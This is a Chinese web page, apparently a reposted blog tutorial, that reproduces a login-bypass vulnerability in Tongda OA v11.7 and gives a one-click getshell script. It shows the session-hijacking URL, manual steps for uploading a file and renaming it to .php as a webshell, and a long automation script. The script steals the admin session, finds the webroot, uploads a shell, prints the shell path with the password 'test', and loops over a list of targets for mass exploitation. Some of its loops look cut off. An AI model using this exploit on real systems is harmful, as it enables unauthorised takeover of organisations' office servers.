通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本) |
您所在的位置:网站首页 › 通达oa怎么登录不了 › 通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本) |
http://x.x.x.x/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 http://x.x.x.x/general/ 查看本地的绝对路径 新建一个附件目录 我们会打开一个新的tab页面,我们使用火狐进行抓包: 先随便改个名字,点击保存,然后会拦截到一个post封包。 数据包格式大概是这个样子: 可以看到我们修改成功。 然后找到之前的文件名,然后将我们上传的原始的文件名(2.jpg)改为(166.php),这个是根据你上传的路径以及改的名称来定的,然后路径的话呢还是file_folder/2013,我们就可以访问到我们的马子了。 一键GetShell脚本脚本代码: #define payload = /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 #define yinhao = " #define Rootre = (.*?) #define contentidre = "TableLine1" index="(.*?)" > #define attachmentidre = ATTACHMENT_ID_OLD" value="(.*?)," #define shellpathre = alt="(.*?)" node-image-tips function GetCookie(url){ res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0"); if(StrFindStr(res[1],"PHPSESSID",0) == "-1"){ return ""; } PHPSESSID = GettextMiddle(res[1],"PHPSESSID=",";"); return PHPSESSID; } function JudgeOK(url,Cookie){ res = HttpGet(url."/general/",Cookie); if(StrFindStr(res[0],"/static/js/ba/agent.js",0) == "-1"){ return "0"; }else{ return "1"; } } function GetRoot(content){ list = StrRe(content,Rootre); num = GetArrayNum(list); num = num/2; i = 0; while(i return list[ToInt(i*2+1)]; } i = i+1; } return ""; } function GetWebRoot(url,Cookie){ res = HttpGet(url."/general/system/reg_view/",Cookie); return GetRoot(res[0]); } function AddPath(url,Root,Cookie){ return HttpPost(url."/general/system/attachment/position/add.php","POS_ID=166&POS_NAME=166&POS_PATH=".URLEncode(Root."\WebRoot")."&IS_ACTIVE=on",Cookie); } function AddImgPath(url,Root,Cookie){ return HttpPost(url."/general/system/picture/new/submit.php","TO_ID=&TO_NAME=&PRIV_ID=&PRIV_NAME=©_TO_ID=admin%2C©_TO_NAME=%CF%B5%CD%B3%B9%DC%C0%ED%D4%B1%2C&PIC_NAME=test&PIC_PATH=".URLEncode(Root."\webRoot")."&ROW_PIC=5&ROW_PIC_NUM=7",Cookie); } function PushImg(url,Content,Cookie){ return HttpPost(url."/general/file_folder/new/submit.php",Content,Cookie.StrRN()."Content-Type: multipart/form-data; boundary=---------------------------33072116513621237124579432636"); } function GetPICID(url,Cookie){ res = HttpGet(url."/general/picture/tree.php?CUR_DIR=&PIC_ID=&_=1615284234507",Cookie); return GettextMiddle(res[0],"&PIC_ID=",yinhao); } function GetImg(url,Root,Cookie){ res = HttpGet(url."/general/picture/picture_view.php?SUB_DIR=2103&PIC_ID=".GetPICID(url,Cookie)."&CUR_DIR=".URLEncode(StrReplace(Root,"\\","/"))."%2Fwebroot%2Ffile_folder%2F2103",Cookie); list = StrRe(res[0],shellpathre); num = GetArrayNum(list); num = num/2; i = 0; while(i return list[ToInt(i*2+1)]; } i = i+1; } return ""; } function ChangeImgName(url,CONTENT,ATTACHMENT,Cookie){ return HttpPost(url."/general/file_folder/rename_submit.php","NEW_FILE_NAME=166&CONTENT_ID=".CONTENT."&FILE_SORT=2&ATTACHMENT_ID=".URLEncode(ATTACHMENT)."&ATTACHMENT_NAME_POSTFIX=php.&ATTACHMENT_NAME=1.jpg&FIRST_ATTACHMENT_NAME=1&FILE_NAME_OLD=1.jpg",Cookie); } function GetCONTENTID(url,Cookie){ res = HttpGet(url."/general/file_folder/folder.php?FILE_SORT=2&SORT_ID=0",Cookie); list = StrRe(res[0],contentidre); if(GetArrayNum(list) >= 2){ return list[1]; } return ""; } function GetATTACHMENTID(url,CONTENTID,Cookie){ res = HttpGet(url."/general/file_folder/edit.php?FILE_SORT=2&SORT_ID=0&CONTENT_ID=".CONTENTID."&start=0",Cookie.StrRN()."Referer: ".url."/general/file_folder/folder.php?FILE_SORT=2&SORT_ID=0"); list = StrRe(res[0],attachmentidre); if(GetArrayNum(list) >= 2){ return list[1]; } return ""; } function GetShell(url){ PHPSESSID = GetCookie(url); if(PHPSESSID == ""){ return ""; } Cookie = "Cookie: PHPSESSID=".PHPSESSID.";".StrRN()."User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0"; if(JudgeOK(url,Cookie)=="1"){ WebRoot = GetWebRoot(url,Cookie); AddPath(url,WebRoot,Cookie); AddImgPath(url,WebRoot,Cookie); ShellPost = ReadFile("script\综合漏洞\OAShell.txt"); PushImg(url,ShellPost,Cookie); path = GetImg(url,WebRoot,Cookie); CONTENTID = GetCONTENTID(url,Cookie); ATTACHMENTID=GetATTACHMENTID(url,CONTENTID,Cookie); ChangeImgName(url,CONTENTID,ATTACHMENTID,Cookie); realshellpath = url."/file_folder/2103/".StrReplace(path,"1.jpg","166.php"); print("Shell路径:",realshellpath,"密码:test"); }else{ return ""; } } function main(args){ print("请输入要要检测的列表文件:"); list = StrSplit(ReadFile(input()),StrRN()); i = 0; num = GetArrayNum(list); while(i |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |